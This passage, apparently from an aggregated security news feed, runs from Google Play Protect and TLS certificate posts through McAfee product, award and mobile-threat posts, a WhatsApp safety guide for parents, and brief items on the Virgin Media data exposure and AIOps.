Malware developers intentionally target devices running long outdated versions of Android to abuse exploits that have recently been patched. In 2018, Google Play started requiring new apps and app updates be built for new versions of the Android OS. This strategy ensures that users downloading apps from Google Play recieve apps that take advantage of the latest privacy and security improvements in the OS.
In 2019, we improved on this strategy with warnings to the user. Play Protect now notifies users when they install an app that is designed for outdated versions. The user can then make an informed decision to proceed with the installation or stop the app from being installed so they can look for an alternative that target the most current version of Android.
Uploading rare apps for scanning
The Android app ecosystem is growing at an exponential rate. Millions of new app versions are created and shared outside of Google Play daily posing a unique scaling challenge. Knowledge of new and rare apps is essential to provide the best protection possible.
We added a new feature that lets users help the fight against malware by sending apps Play Protect hasn't seen before for scanning during installation. The upload to Google’s scanning services preserves the privacy of the user and enables Play Protect to improve the protection for all users.
Integration with Google’s Files app
Google’s Files app is used by hundreds of millions of people every month to manage the storage on their device, share files safely, and clean up clutter and duplicate files. This year, we integrated Google Play Protect notifications within the app so that users are prompted to scan and remove any harmful applications that may be installed.
Play Protect visual updates
The Google Play Store has over 2 billion monthly active users coming to safely find the right app, game, and other digital content. This year the team was excited to roll out a complete visual redesign. With this change, Play Protect made several user-facing updates to deliver a cleaner, more prominent experience including a reminder to enable app-scanning in My apps & games to improve security.
The mobile threat landscape is always changing and so Google Play Protect must keep adapting and improving to protect our users. Visit developers.google.com/android/play-protect to stay informed on all the new exciting features and improvements being added to Google Play Protect.
Acknowledgements: Aaron Josephs, Ben Gruver, James Kelly, Rodrigo Farell, Wei Jin and William Luh

How Google does certificate lifecycle management


Over the last few years, we’ve seen the use of Transport Layer Security (TLS) on the web increase to more than 96% of all traffic seen by a Chrome browser on Chrome OS. That’s an increase of over 35% in just four years, as reported in our Google Transparency Report. Whether you’re a web developer, a business, or a netizen, this is a collective achievement that’s making the Internet a safer place for everyone.

Percentage of pages loaded over HTTPS in Chrome by platform (Google Transparency Report)

The way TLS is deployed has also changed. The maximum certificate validity for public certificates has gone from 5 years to 2 years (CA/Browser Forum), and that will drop to 1 year in the near future. To reduce the number of outages caused by manual certificate enrollments, the Internet Engineering Task Force (IETF) has standardized Automatic Certificate Management Environment (ACME). ACME enables Certificate Authorities (CAs) to offer TLS certificates for the public web in an automated and interoperable way. 

As we round off this exciting tour of recent TLS history, we’d be remiss if we didn’t mention Let’s Encrypt - the first publicly trusted non-profit CA. Their focus on automation and TLS by default has been foundational to this massive increase in TLS usage. In fact, Let’s Encrypt just issued their billionth (!) certificate. Google has been an active supporter of Let’s Encrypt because we believe the work they do to make TLS accessible is important for the security and resilience of the Internet's infrastructure. Keep rocking, Let’s Encrypt!

Simplifying certificate lifecycle management for Google’s users

These are important strides we are making collectively in the security community. At the same time, these efforts mean we are moving to shorter-lived keys to improve security, which in-turn requires more frequent certificate renewals. Further, infrastructure deployments are getting more heterogeneous. Web traffic is served from multiple datacenters, often from different providers. This makes it hard to manually keep tabs on which certificates need renewing and ensuring new certificates are deployed correctly. So what is the way forward? 

With the adoption numbers cited above, it’s clear that TLS, Web PKI, and certificate lifecycle management are foundational to every product we and our customers build and deploy. This is why we have been expanding significant effort to enable TLS by default for our products and services, while also automating certificate renewals to make certificate lifecycle management more reliable, globally scalable, and trustworthy for our customers. Our goal is simple: We want to ensure TLS just works out of the box regardless of which Google service you use.

In support of that goal, we have enabled automatic management of TLS certificates for Google services using an internal-only ACME service, Google Trust Services. This applies to our own products and services, as well as for our customers across Alphabet and Google Cloud. As a result, our users no longer need to worry about things like certificate expiration, because we automatically refresh the certificates for our customers. Some implementation highlights include:

  • All Blogger blogs, Google Sites, and Google My Business sites now get HTTPS by default for their custom domains.
  • Google Cloud customers get the benefits of Managed TLS on their domains. So:
    • Developers building with Firebase, Cloud Run, and AppEngine automatically get HTTPS for their applications.
    • When deploying applications with Google Kubernetes Engine or behind Google Cloud Load Balancing (GCLB), certificate management is taken care of if customers choose to use Google-managed certificates. This also makes TLS use with these products easy and reliable.
Performance, scalability, and reliability are foundational requirements for Google services. We have established our own publicly trusted CA, Google Trust Services to ensure we can meet those criteria for our products and services. At the same time, we believe in user choice. So even as we make it easier for you to use Google Trust Services, we have also made it possible across Google’s products and services to use Let’s Encrypt. This choice can be made easily through the creation of a CAA record indicating your preference.

While everyone appreciates TLS working out of the box, we also know power users have specialized needs. This is why we have provided rich capabilities in Google Cloud Load Balancing to let customers control policies around TLS termination. 

In addition, through our work on Certificate Transparency in collaboration with other organizations, we have made it easier for our customers to protect their and their customers’ brands by monitoring the WebPKI ecosystem for certificates issued for their domains or those that look similar to their domains, so they can take proactive measures to stop any abuse before it becomes an issue. For example, Facebook used Certificate Transparency Logs to catch a number of phishing websites that tried to impersonate their services. 

We recognize how important security, privacy, and reliability are to you and have been investing across our product portfolio to ensure that when it comes to TLS, you have the tools you need to deploy with confidence. Going forward, we look forward to a continued partnership to make the Internet a safer place together.

Sharath Srinivasamurthy of IDC India Highlights The Future of Trust

With the changing nature of consumption of infrastructure, applications and diversity of endpoints, it is essential for organizations to look at security as an organizational strategy rather than a tactical IT activity. Sharath Srinivasamurthy, Research Director for Software, Services and ICT Practices at IDC India explains why trust extends beyond cybersecurity to ensure employees, partners and customers perceive an organization to be trustworthy.

RSA 2020 Recap: New image, new approach, new integrated solutions

As expected, the 2020 RSA Conference was a whirlwind of exciting announcements and product updates. Some key takeaways from the conference:

  1. We can’t wait for time to tell. Chief Technology Officer Steve Grobman delivered a dynamic presentation from the RSA mainstage, where he compared current cyber defenses and legacy immunology practices. Grobman was a visionary in the way he presented and talked about the future of quantum computing. Ultimately there’s an exponential amount of benefit that could be derived from quantum computing, and it can fundamentally change the way we do computing. “We can’t think of quantum in terms of eventually or tomorrow. Because quantum is a real risk today. You must assume that adversaries are already accessing your most sensitive data. It’s encrypted, but they still find it valuable. They’re not worried about [decrypting] it today. They’re counting on quantum to do that in the future.” Grobman explained during his RSA keynote.
  2. Journey to the cloud. Rajiv Gupta, SVP of McAfee’s Cloud Business Unit, and Tony Taylor, CISO of Land O’Lakes, took to the CSA keynote stage to talk about Land O’Lakes’ journey to the cloud. Rajiv and Tony defined “cloud-first” and shared the top three lessons learned from LandO’Lakes’ cloud journey: On-Prem rules don’t apply, Shadow IT is daunting, and data finds a way out.
  3. New image, new approach, new integrated solutions. The RSA Conference is one of our biggest events each year. In 2020, we unveiled a new modern, futuristic booth and were excited to see that it was mostly standing-room only, packed with customers, prospects, partners, press, and industry analysts.

Some of the announcements pertaining to McAfee:

  • Substantial headway with McAfee partner program – We announced eight new partnerships and seven new certified integrations to McAfee Security Innovation Alliance(SIA) and McAfee CASB Connect Program to give organizations a competitive advantage to secure people, devices and data in the cloud. We have a total of 160 integration partners through the McAfee SIA and McAfee CASB Connect Programs.
  • Agreement to acquire Light Point Security – During the week of RSA, we entered into a definitive agreement to acquire Light Point Security, to extend MVISION Unified Cloud Edge (UCE) capabilities for Secure Access Service Edge (SASE). This agreement demonstrates how we continue to strengthen our solutions through innovation and acquisition to provide its customers with state-of-the-art solutions to prevent and detect threats without limiting performance.
  • Launched a global Managed Detection and Response (MDR) platform – DXC Technology is our first strategic MDR partner to leverage McAfee’s MVISION EDR solution to proactively detect cyber threats faced by customers and resolve security incidents faster. With MVISION EDR, MVISION ePO and McAfee Advanced Threat Defense, DXC Technology will be able to deliver a leading managed Endpoint Security solution that will benefit from cloud-based analytics with automated AI-guided investigations for efficient triage and investigations, to enable faster response times.
  • New innovations to MVISION Cloud platform – The newly announced enhancements to the MVISION Cloud platform help organizations protect the entire infrastructure and application stack of their cloud-native applications. Available now, MVISION Cloud Native Infrastructure Security includes Cloud Security Posture Management (CSPM), Cloud Workload Protection Platform (CWPP) and Container Security technologies integrated into one security management experience. Together, these solutions offer a broad set of capabilities to secure multi-cloud Infrastructure-as-a-Service (IaaS)/Platform-as-a-Service (PaaS) and hybrid cloud environments.
  • Introduced McAfee Unified Cloud Edge (UCE) – UCE provides unified data and threat protection from device level to the cloud. With this announcement, we become the only vendor to provide a converged security solution to simplify the adoption of Secure Access Service Edge (SASE) architecture, which aims to increase security and reduce the cost and complexity of modern cybersecurity. UCE brings together the capabilities of McAfee Cloud Access Security Broker (CASB), Secure Web Gateway (SWG), and DLP in one cloud-native platform.
  • Committed to making cloud the most secure environment for business – McAfee MVISION platform builds upon two foundational pillars —MVISION Cloud and MVISION Endpoint. Together, they enhance and simplify security by providing a core set of common security services that are cloud native, unified and open. Our recently released MVISION innovations are further proof of our commitment to make cloud the most secure environment for business.
  • Industry recognitions and awards – We are excited to have been recognized by an industry analyst firm, Cyber Defense Magazine, Info Security PG, CRN and others. We want to thank you – our customers and partners – who help us with these achievements.

Thank you to those that stopped by our booth and/or attended our sessions. We hope to see you again in 2021!

For more, listen now to Interim CMO Vittorio Viarengo and VP of Product & Solution Marketing Naveen Palavalli as they discuss highlights from this year’s RSAC.

The post RSA 2020 Recap: New image, new approach, new integrated solutions appeared first on McAfee Blogs.

Join the Cyber Security Dance

Automation and orchestration are central to the proverbial cyber security dance between IT operations and security operations center (SOC).  Both functions need to work with each other and establish a rhythm and alignment to keep their organization protected from cyber threats. The lure to automate is driven by the desire to remove tedious and repetitive tasks and allow for more strategic efforts.  Orchestration is bringing technologies (security and non-security) to coordinate and work together.  Both ignite the dance to stomp out cyber attacks.

A misconception is that automation means replacing human work, but it’s quite the opposite. Instead, organizations using automation for cyber security have more staffing (2019 SANS Automation & Integration Survey).  This suggests the human eye and intervention is still needed today to address core cyber security functions.

The impact automation is having on cybersecurity offers a perfect stage for IT operations and security operations to “tango”. Automation is a series of sequential tasks setting the groundwork for orchestration of functions working together.  A common use case is identifying a threat, triggering more investigation, while quarantining the device.  It doesn’t really matter which security framework you use to assess what can be automated and orchestrated.  Let’s talk about the top three requirements for automation that align with the steps called in NIST’s Cyber Security Framework.  These steps are designed to increase speed and productivity to quickly and effectively resolve the attack.

Abbreviated NIST Cyber Security Framework (CSF)

Top 3 requirements for automation (2019 SANS Automation & Integration Survey 1)

SANS also weighed on the risk of automation.  Beyond the obvious risk of not having budget and resources there is dependency on other IT operations processes and tools that can impede key processes and there is lack of integration standards across tools (e.g., ability to interface systems, correlate data.)  This lack of integration concern can be dismissed on a couple of fronts.  Namely, security tools with necessary integrations such as a Security Orchestration Automation Response (SOAR) tool that stitches security tools for distinct use case or “play”, and/ or a security platform that integrates tools.  Both approaches assert and empower cybersecurity teams to provide a highly effective united front—or dance to win against the adversaries.

McAfee delivers both approaches. McAfee ePO is the highly acclaimed centralized management solution. It is the key reason customers choose and stay with McAfee. McAfee ePO provides a central hub and common view for IT operations to enforce and protect while offering the SOC to investigate, triage and assess threats. It also offers automation of functions including identifying devices out of compliance, updating policy, identifying known threats, and quarantining a device. In addition, there are SOAR players that plug into the McAfee ecosystem for more advanced plays.

I had a chance to catch up with McAfee’s new Vice President on Platform Technologies on this topic and uncovered some new news from McAfee.

“ePO is core to removing complexity from cybersecurity by offering common access point to many security functions from McAfee or third-party providers. It is pivotal to McAfee’s integrated platform approach anchored by ePolicy Orchestrator (ePO) for central administration and context-aware operations with the Data Exchange Layer (DXL) for communication,” states Lana Knop, VP Platform Technologies. “This is the reason I came to McAfee. To deliver and build on the promise of Together is Power. We are happy to announce we will have a SOC option in MVISION ePO – our first SOAR offering is with Siemplify.”

To embolden this cybersecurity dance, MVISION ePO (the cloud-based ePO) has made available a SOC tab in the console that makes the first SOAR offering, Siemplify, easily available.  This allows MVISION ePO customers an option to leverage SOAR capabilities anytime.  You can imagine the range of SOC capabilities that McAfee and 3rd party could bring.

Here is a use case that was spoken to at RSA 2020 for an Unknown File Execution.  It shows how the solutions are working together from detection to investigation and response.

Here is your chance to construct your own “line dance” on an advanced integrated platform to accelerate your cybersecurity defenses!

The post Join the Cyber Security Dance appeared first on McAfee Blogs.

Crescendo: Real Time Event Viewer for macOS

Prior to 2017, researchers couldn’t easily monitor actions performed by a process on macOS and had to resort to coding scripts that produced low level system call data. FireEye released Monitor.app in 2017 that enabled collection of information on macOS at a higher level; at a simplified data set versus something like Dtrace. I created many versions of Monitor.app over the years and have received very positive feedback from users. Recently though, users have noticed it doesn't work on macOS Catalina (10.15)...

Originally, a kernel extension was required to provide the inspection capabilities offered by Monitor.app. Unfortunately, kernel extensions are running in privileged mode which has very little protection from software bugs that may lead to system instability. This means kernel extensions should only be used if absolutely necessary. Microsoft and Apple have started providing engineers more userland alternatives to accomplish what previously required writing kernel code.

In Catalina, Apple released the Endpoint Security Framework (ESF) to provide a robust and (more importantly) safer way of getting access to internal operating system artifacts. Being a security guy, I’m not a huge fan when apps must ship with kernel extension to get their job done and I think this is a move in the right direction. With the coming release of 10.15.4, Apple will now pop-up a warning when a kernel extension is loaded that uses a set of these deprecated kernel programming interfaces (KPIs).

Now seemed like a good time to kick the tires on the Endpoint Security Framework. Also, what engineer doesn’t love to learn new languages, so why not write it all in Swift as well?

Introducing Crescendo

Crescendo is a real time event viewer for macOS that uses the ESF to show process executions and forks, file events, share mounting events, kernel extension loads, and IPC event data. ESF provides a vast amount of data, but the goal was to just pick out the things that analysts would be interested in when analyzing a piece of malware or trying to understand how a process (or component) works. Just the right amount of data without being a firehose of events to the user.

Here are some of the features of Crescendo:

  • System Extension using Endpoint Security Framework
  • Real time event viewer and event detail viewer
  • Search for easy filtering of events by process, PID, username, or event type
  • Filters for unsigned apps vs apple signed apps
  • Ability to export all events to JSON
  • Context highlighting when unsigned apps are executed

Apple has added some extra security features that require some extra setup for enabling Crescendo’s system extension. Head on over to the Getting Started section in the README to get started. I'm hopeful this inconvenience will be fixed in future versions.

Oh, One More Thing...

Crescendo is being released open source under the MIT license! It consists of a ready to use framework that wraps the ESF with a Swift interface, removing some of the nuances and providing a simple callback for event data. This way other developers don't have to understand all the inner details of the Endpoint Security Framework. One caveat, if you wish to use the framework in your own app, you must obtain an entitlement from Apple

Missing a feature you’d like to see? Submit a Pull Request!

Head over to the Crescendo Github to learn more and download the latest release.

Infographic: Cyber Attacks and Data Breaches of 2019

Throughout 2019, we kept an eye on cyber attack and data breach reported in mainstream publications, releasing our findings in our monthly blog series. 

This allowed us to see how many security incidents were occurring, how many records were involved and which industries were worst affected. 

Did you know, for example, that July was the worst month of the year in terms of breached records? Or that the leading cause of data breaches was internal error? 

With 2019 in the books, we’ve summarised these and other facts in an infographic. 

data breach and cyber attacks 2019
Download the full infographic >>

The post Infographic: Cyber Attacks and Data Breaches of 2019 appeared first on IT Governance UK Blog.

Is WhatsApp Safe for Kids? Here’s What Parents Need to Know

WhatsApp Web

We may be talking about the TikTok app in our public circles, but there’s another app — just as widely used — that kids are hoping parents’ won’t ask too many questions about. That’s because they can use the messaging app WhatsApp to talk privately with friends, exchange content and videos, and (hopefully) fly under the parentals’ radar.

What is WhatsApp?

WhatsApp is a downloadable app that uses your phone’s internet connection (wifi) to send messages, photos, videos, or files. It also allows users to make real-time video calls (much like iOS’ FaceTime). The big perk: WhatsApp can be used by connecting to any wifi so users can avoid using up minutes or texting fees. If you travel internationally, using WhatsApp is a popular way to avoid expensive international calling charges.

Why do kids love WhatsApp?

It’s easy, it’s fun, it’s free. WhatsApp Messenger lets kids send text messages, videos, photos, and audio messages as well as make video calls to friends without message limits or fees. Oh, and so far, it’s ad free, which is a plus.

It’s a stealth chatting app. WhatsApp is a popular way to create group chats (up to 256 people) that parents won’t necessarily think to check. Often kids will meet someone on one app such as Snapchat or Instagram and move to WhatsApp because they feel its less public and less regulated by parents. Like any other app, it can also be hidden behind decoy or vault apps to avoid detection.

WhatsApp web
You can’t miss the bright green WhatsApp icon on your child’s phone or in the desktop application folder. ©WhatsApp

It has cool features. WhatsApp has a broadcast feature that allows a user to send out a message to a group of people that can then only respond to the sender. The Status Feature enables users to send disappearing photos, videos, and GIFs, much like the fun features on Instagram and Snapchat.

WhatsApp hacks keep it fun. Kids love workarounds and cool functionality hacks they can use to enhance their WhatsApp experience. WhatsApp hacks can be found online with a quick Google search. Hacks help users understand how to do fun things such as schedule messages, create fake conversations, retrieve deleted messages, turn off Read receipts, make a Broadcast List, and formatting hacks that will help their account stand out.

There’s a perception of secrecy/security. WhatsApp has end-to-end encryption built-in, which means any texts, photos, or videos exchanged between users are encrypted (scrambled code) and assumed to be secure between the people communicating. WhatsApp has set itself apart from other chat apps in this area. No server stores messages after they are delivered. Not even WhatsApp can read, view, or listen to the chats, which gives users a sense of privacy and security. However, as we are reminded daily, WhatsApp, like every app is vulnerable to hacks, scams, and breaches.

What are the risks?

Inappropriate, secretive content. As with any app, the biggest concern is in the way kids and others use the app. WhatsApp (like any messaging app) allows anyone to create an account. Kids can be exposed to inappropriate content and exchange inappropriate content with others. As with any app, kids will also use acronyms or slang to hide risky behavior.

Strangers. A lot of people use WhatsApp, including those with harmful intentions. Users may assume group chats are closed to strangers since group members need a digital link to join. However, group chat links can be copied by group members and shared with anyone who can then click and join without any vetting.

Cyberbullying. Group texts are a big reason kids use WhatsApp. They can have groups as large as 250 kids. So, if a rumor, mean comment is shared or conflict erupts, situations can get intense very quickly and easily spill beyond the WhatsApp environment.

Privacy. While kids believe WhatsApp safely encrypt conversations, it does not protect them from people taking and sharing screenshots. Private discussions and photos can also be downloaded. Another threat to privacy is the way the app itself collects data of its users, which can be reviewed in its Privacy Policy and User Data section.

Scams and malware. WhatsApp is not immune to the typical scams that target social apps. The Facebook-owned app has had issues with spyware, catfishing, phishing, money requests, and fraudulent job opportunities — all in a quest to get users to hand over their personal information or assets.

Fake news. Because WhatsApp allows a user to chat in a group of up to 250 people, it’s easy for information to go viral quickly, even that information isn’t accurate. More recently, fake news originated on WhatsApp that incited panic around Coronavirus conspiracies and the 2018 mob killing in India.

Family Safety Tips

WhatsApp web
The WhatsApp interface. ©WhatsApp

Download and discuss the app. WhatsApp is easy to download and understand (simple texting interface). Once you know the basics, discuss the pros and cons of WhatsApp with your child. Ask your child to walk you through his or her app to show you how they use it.

Some questions to consider asking might be:

What do you like most about WhatsApp?
What kind of group chats are you a part of?
What kind of media do you mostly receive and send?
Are there any people in your group chats you don’t know?
Are your location and account settings as secure as they can be?
Have you shared personal information or your phone number?
Has any situation made you feel uncomfortable while on the app?

Guide younger users. For younger children or new WhatsApp users (age requirement is 13), consider creating a private WhatsApp group just for your family. Teach your kids to create a safe profile, maximize safety features, block strangers, report bullying, and how to safely share pictures, videos, and communicate. Use this time, teach them the upside of the app and the risks.

Monitor devices, screen time, and behavior. There are a lot of issues to consider and pay attention to when your kids use messaging apps. First, to monitor content, consider security software as well as filtering software. Second, pay attention to screen time and your child’s ability to balance technology use. Third, monitor behavior. Messaging apps connect kids to groupthink, a variety of content, and several emotional danger zones. Technology monitoring includes paying particular attention to your child’s emotional and physical health, friend groups, academic performance, and sleep habits.

Talk about privacy settings. Encourage your child to maximize settings and use the two-step verification option that allows a custom PIN for security against breaches and hacks. Privacy settings will allow users to choose Everyone, My Contacts, and Nobody. Review profile information and omit any personal information (age, phone number, other account links, school name, hometown).

Control location sharing. When location sharing is turned on, the images your child shares on WhatsApp will also show his or her exact location when the photo was taken. Be aware of this and consider keeping location turned off.

Avoid strangers and strange links. Once a person outside of your child’s known circle has his or her phone number, they can send any content directly unless (and until) they are blocked. They can catfish, scam, or groom WhatsApp users. Talk with your child about the importance of only chatting with known, trusted people and to block messages from strangers. Messages from strangers could contain explicit content, malware, spam, or phishing scam.

Should your child be on WhatsApp? As long as your child is only connected to trusted people (and has some form of monitoring), this can be a relatively safe social app that echos the features of most other apps. However, every family and every child is different, and whether or not your child is allowed to use the app is a personal decision. If your child is active on the app with your approval, one way to help them navigate the danger zones is to keep the safety conversation on-going and honest. Your guidance is crucial. You’ve got this parent!

The post Is WhatsApp Safe for Kids? Here’s What Parents Need to Know appeared first on McAfee Blogs.

Celebrate International Women’s Day By Embracing a Career in Technology

This Sunday, we celebrate International Women’s Day, a global day for championing the social, economic, cultural, and political achievements of women. This day also marks a call to action for accelerating women’s equality. This lack of equality becomes very apparent when we examine the technology sector, where only 25% of women hold positions in computing. What’s more, this figure includes women in IT whose daily jobs entail security responsibilities. For these reasons, it’s difficult to infer whether there has been significant growth in female security professionals.

The Need for Diversity

Diversity is particularly critical in technology, as it balances the make-up of the future workforce to better reflect the communities they serve. Because technology is so complex and dynamic, having a range of ideas and approaches from diverse groups can make a huge difference in problem-solving. By including underrepresented groups like women in security, there’s greater potential for tackling real-world challenges in the industry.

How to Catalyze Your Career in Security

1. Look for educational opportunities

This begs the question – how can women become more empowered in the security industry? For starters, young women should look for more educational opportunities to incorporate security training into their repertoire. In today’s society, millennials and Gen Zers are practically born with devices in their hands. Young professionals have probably gained a lot of tech exposure starting at a very young age. This natural knack for technology should be nurtured, which is precisely what proper security training can do.

2. Increase your chances of landing a job

Additionally, there is a growing need for security professionals in general, as the cyber landscape continues to evolve. This means the potential to get a job is high. Young women can seek out top-notch cyber education programs or courses at universities and colleges to set their security career on the right path. Plus – never underestimate the power of networking. Many educational organizations host networking events for security professionals. Meeting with these people can provide hopeful security professionals with insights on what it’s like to work in the industry, as well as best practices for helping to grow your career.

3. Take culture and diversity into account

As young female professionals begin to seek out their next move into the world of security, they must also be sure to take the company’s culture and diversity into account. At the end of the day, it’s important to work for an organization that creates an inclusive environment and nurtures innovation. Young professionals can even help to facilitate this kind of culture by finding ways to be involved in company initiatives that drive inclusion and diversity – this all starts with speaking with a manager or HR representative to find out how.

Making Strides Forward This International Women’s Day

This International Women’s Day take the time to reflect on how you can drive equality in your industry. Whether it’s taking that first step toward a career in the security sector or figuring out how you can make a difference at your current job, celebrate these opportunities and commit to striving for an environment of equality.

To stay updated on all things McAfee and the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Celebrate International Women’s Day By Embracing a Career in Technology appeared first on McAfee Blogs.

Oscars, schmoscars

The Grammys are ancient history. So are the Golden Globes. And Hollywood’s best and brightest have said their thanks to the Academy, been played off, and chauffeured home with golden trophies in hand and champagne toasts in the rearview mirror.

And yet, the accolades continue.

That is, they continue for one of the largest pure-play cybersecurity companies—because the 2020 season of industry distinctions is still well underway for McAfee.

Heading up the list of recognitions are three late-breaking citations from Cyber Defense Magazine for McAfee MVISION Cloud: Most Innovative Cloud Security, McAfee Endpoint Security: Most Innovative Endpoint Security, and McAfee MVISION EDR: Most Scalable Endpoint Security. This trio of commendations means a great deal, as the Cyber Defense editorial team is pledged to honor only the best ideas, and the best products and services in IT.

McAfee also won a coveted black crystal trophy in the 16th Annual Info Security Product Guide’s 2020 Global Excellence Awards, taking gold in the Cloud Access Security Brokers (CASB) category for our MVISION Cloud for Container Security offering. Info Security PG annually honors achievement across all of IT security, worldwide, making this citation a special achievement.

On the channel front, CRN has been busy with its annual tradition of list-making. They named McAfee—the device-to-cloud cybersecurity company—among the year’s best-of-the-best of device and cloud companies. Specifically, they named McAfee one of The 20 Coolest Endpoint Security Companies Of 2020 and one of The 100 Coolest Cloud Computing Companies Of 2020.

In a world where attacks and breaches grow ever more costly, the need to prevent file-less attacks, to protect the mobile experience, and to automate responses becomes ever more important. McAfee Endpoint Security delivers centrally managed defenses to meet those challenges, and then some. CRN recognizes the need to better tie together control points on the device and in the cloud, which is the genesis of the MVISION family of products and services.

On the cloud front, CRN said, “A surge in digitalization in the cloud has increased the amount of data theft in the last half-decade due to increased generation of digital content and lack of security to protect financial and corporate data.” They also called out McAfee’s acquisition of multi-cloud application and security platform NanoSec, because our new Unified Cloud Edge (UCE) offering relies on solid governance and compliance. UCE also helps reduce the risk of cloud and container deployments through definition and application of a single data protection and threat prevention policy across the device, the network, and the cloud.

Finally, McAfee is the only vendor to be named as a January 2020 Gartner Peer Insights Customers’ Choice for Cloud Access Security Brokers (CASBs). Think about it. While all vendors, including McAfee, are passionate about the work they do to help customers protect what matters most, it’s when those same customers speak out that matters most. Case in point: In this most recent Gartner Peer Insights Customers’ Choice report, McAfee is the only vendor with at least 50 non-vendor sponsored reviews, and a score of 4.6 out of 5 stars. A special thank you to our customers who raised their voices in support of McAfee.

So, pop a cork and raise a glass with us as we take a brief moment to savor this news of multiple recognitions, because it’s you—our customers and partners—who actually are being called out in these accolades.

Of course McAfee is proud to commemorate the first months of 2020 in this way. But we’re even more proud to get back to work, to stand side by side with you, the frontline defenders who do the yeoman’s work every day, to protect the digital experience.

Now that’s an effort worthy of celebration.

Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

 

The post Oscars, schmoscars appeared first on McAfee Blogs.

Contacts of 1m Virgin Media customers left on unsecured database

At least one person from outside Virgin Media accessed non-financial details

Almost a million Virgin Media customers had their personal details stored on a marketing database that had been left unsecured since last April, the company has admitted.

Records show that the database has been accessed by at least one person from outside the company, Virgin Media said, although it does not yet have any evidence that the information has been used illegally.

Continue reading...

McAfee Men Share Fresh Perspectives on Gender Equality

Every year, McAfee recognizes International Women’s Day and as part of our celebrations, we asked McAfee men around the world to share their thoughts about creating a more gender equal world. They offer candid and rich insights with takeaways to remember inside and outside of the workplace.

“We’re all indoctrinated by the cultures in which we’ve grown up and lived. And so, it starts with just being aware of some of those things within us.” —Adam, SVP, Sales EMEA (Slough)

“I have two kids, a son and a daughter – both of whom say they want to be programmers. I want to do everything possible to ensure the get the same opportunities when they grow up.” —Vishnu, Director, Software Engineering (Waterloo)

“Diversity is not just a social issue, it is a business need.” –Chandramuli, Director, Info Tech (Bangalore)

Listen to more of the men’s perspectives below. We’d love to hear your insights and perspectives too—feel free to share in the comments.

 

 

Interested in building your career at company that helps women thrive? Search our openings! 

The post McAfee Men Share Fresh Perspectives on Gender Equality appeared first on McAfee Blogs.

What is AIOps? Injecting intelligence into IT operations

Cloud platforms, managed service providers and organizations undertaking digital transformations are beginning to reap the benefits of an emerging IT trend: the use of AI-powered IT operations technology to monitor and manage the IT portfolio automatically.

This emerging practice, known as AIOps, is helping enterprises head off potential outages and performance issues before they negatively impact operations, customers, and the bottom line. But the more advanced deployments are beginning to use AI systems not just to identify issues, or to predict issues before they happen, but to react to events with intelligent, automated mitigation.

(Insider Story)

No Shortage of Privacy Information

At 32-pages, the proposed, modified regulations for the CCPA, are much shorter than the actual law.  That 10,000+ word law has had Privacy professionals crazy busy during the last year. If the CCPA regulations are “short”, then what’s not in short supply is an avalanche of information where privacy is concerned. There are a variety […]

The post No Shortage of Privacy Information appeared first on Privacy Ref.

Fear, loathing and profits – the battle over data access and data privacy in healthcare

Nothing has roiled the healthcare technology markets since the beginning of the year as much as data access and data privacy. One of the significant issues debated today is whether patients should be given free and open access to their health records sitting today in EHR systems. A  proposed ruling by the Dept of Health and Human Services (HHS), awaiting finalization, will hand over data access to patients who, in turn, can share it freely with anyone they choose. Further, the ruling warns of penalties for information-blocking and other restrictive practices.

To read this article in full, please click here

The mobile threats you can’t even see

chat etiquette

Over the last year, we’ve seen more stories in the news than ever before about the big picture of cybersecurity, with politicians being increasingly public about how technology is affecting international relationships. All of this can make it feel like staying safe online is out of consumers’ hands, with decisions being made at the top level having the decisive impact on personal online security.

However, people have been getting smarter about their security for years, with initiatives like World Password Day highlighting the simple steps that people can take to really improve safety. Unfortunately, as consumers get better at protecting themselves, and as companies like McAfee get better at detecting threats, criminals will change tactics and find new ways to attack people online.

Today, there is a whole new arena for criminals to explore, and it’s growing rapidly. According to the GSMA, there are now more than 5bn people with mobile phone service subscriptions globally, while a recent report has predicted that by 2030 the average person will own fifteen different connected devices. With the exception of nation-state attacks, most cybercriminals are looking at this huge, desirable target with the same thought in mind that they always have: what is the quickest, easiest way to make money?

A moving target

In McAfee’s latest Mobile Threat Report, we show some of the emerging tactics being used to turn consumer connectivity into criminal profit – and potentially damage users in the process. Rather guessing or compromising a user’s personal details and passwords, these new threats use sophisticated awareness of how people use their phones in order to manipulate them.

For example, one malware family we found, called LeifAccess or Shopper, shows users scary-sounding but non-specific warning messages, such as ‘security error should be dealt with immediately’, in order to trick users into giving it additional permissions on the phone. It then uses these permissions to create fake accounts and automatically post positive reviews of specific apps. This makes others more likely to download those apps, giving the developers advertising revenue from an app which is at best poor quality and at worst dangerous. In one instance, we found over 7,000 fake reviews for one app.

In a similar trend, we found an increase in HiddenAds malware being distributed outside of app stores. These apps are shared in places like the gaming chat app Discord and in links under YouTube videos, pretending to be free versions of legitimate apps. Once installed, these apps instead hide themselves in the background and request adverts to generate revenue for their creators.

Both of these threats use clever tactics to perform attacks without needing a user’s password, and their presence is growing rapidly: with an increase of 30% from 2018 to 2019, hidden apps now represent almost half of all the malicious activity we detect on mobile. Alarmingly, similar tactics are even being used to attack whole countries. We found that a legitimate public transport app in South Korea had been cleverly compromised to scan the user’s phone for keywords relating to politics and the military and upload any relevant documents to a remote server.

Beyond stronger passwords

Cybersecurity will always be an arms race: on one side, the attackers and criminals, and on the other side, users and security companies like McAfee. The good news is that, while this malware is using a range of clever tactics to fly in under the radar without needing a password, there are still simple actions which consumers can take to minimise their risk:

  • Stick to the app store: We may be seeing some compromised apps on official stores, but that doesn’t mean that the stores aren’t vastly safer than the internet at large as a place to download apps, and the majority of mobile malware downloads we see are coming from unofficial sources such as social media.
  • Keep your software updated: Developers and researchers are finding and fixing new security issues all the time – but those fixes only help if users install them. To maximise your online protection, both your phone’s operating system and its apps should be frequently updated.
  • Use security software: For smartphones just as much as computers, security software is a powerful way of defending your data and maintaining your privacy. You might also consider using an ID monitoring tool, which will alert you to any strange activity which could indicate a compromised phone or account.

Strong, secure passwords are still, of course, incredibly important, but as cybercriminals evolve, so must we. By staying up to date with the latest threats and thinking beyond traditional security measures, you can defend against even the invisible threats.

The post The mobile threats you can’t even see appeared first on McAfee Blogs.

Is Mobile Malware Playing Hide and Steal on Your Device?

